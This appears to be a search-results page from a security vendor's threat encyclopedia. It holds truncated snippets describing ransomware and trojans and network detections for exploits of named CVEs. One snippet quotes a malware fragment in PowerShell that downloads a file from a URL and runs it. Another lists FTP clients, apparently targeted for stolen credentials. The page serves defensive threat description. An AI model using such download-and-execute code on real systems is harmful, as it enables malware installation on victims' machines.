Search

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It encrypts files with specific file extensions. It

(new-object system.net.webclient).DownloadFile($um.ToString(), $pp); Start-Process $pp; break; } catch { Write-Host $error[0].Exception } } It does not exploit any vulnerability. NOTES: The MS Excel file

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. It encrypts files

GlobalSCAPE CuteFTP Lite GlobalSCAPE CuteFTP Pro GoFTP INSoftware NovaFTP Ipswitch WS_FTP LeapWare LeapFTP LeechFTP LinasFTP MAS-Soft FTPInfo MS IE FTP Martin Prikryl My FTP NCH Software ClassicFTP NCH Software

Description Name: CVE-2019-1652 CISCO UNAUTHENTICATED RCE - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry.The host exhibiting this type of network behavio...

Description Name: CVE-2014-9118 ZHONE RCE EXPLOIT - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of network behavior is likely comprom...

Win32/Exploit.CVE-2014-4114.A (ESET), Trojan.PPDropper (Symantec) An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm” October 2014 Patch Tuesday Fixes Sandworm Vulnerability MS Zero-Day Used in Attacks

Description Name: CVE-2018-8476 Windows Deployment Services Remote Code Execution Exploit - TFTP (Request) . This is Trend Micro detection for TFTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movem...

Description Name: CVE-2019-6703 WordPress Total Donations Unauthentication Exploit - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of n...

Description Name: CVE-2016-1555 - Netgear Devices - Unauthenticated Remote Code Execution - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this ty...

Description Name: CVE-2016-3088 ACTIVEMQ - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of network behavior is likely compromised by m...

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It does not have any backdoor routine. It does not have

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It takes advantage of certain vulnerabilities. Arrival

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a

“Sandworm” October 2014 Patch Tuesday Fixes Sandworm Vulnerability MS Zero-Day Used in Attacks Against European Sectors, Industries Sandworm to Blacken: The SCADA Connection Downloaded from the Internet

Description Name: CVE-2017-10271 - Oracle Weblogic Exploit - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry.The host exhibiting this type of network behavi...

Description Name: CVE-2018-8653 MSIE Remote Code Execution - HTTP (Response) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting this t...

Description Name: CVE-2019-8942 WordPress Image Remote Code Execution Exploit - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of networ...

_locales\it\messages.json _locales\ja\messages.json _locales\ko\messages.json _locales\ms\messages.json _locales\nl\messages.json _locales\no\messages.json _locales\pl\messages.json _locales\pt\messages.json

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It connects to certain websites to send and receive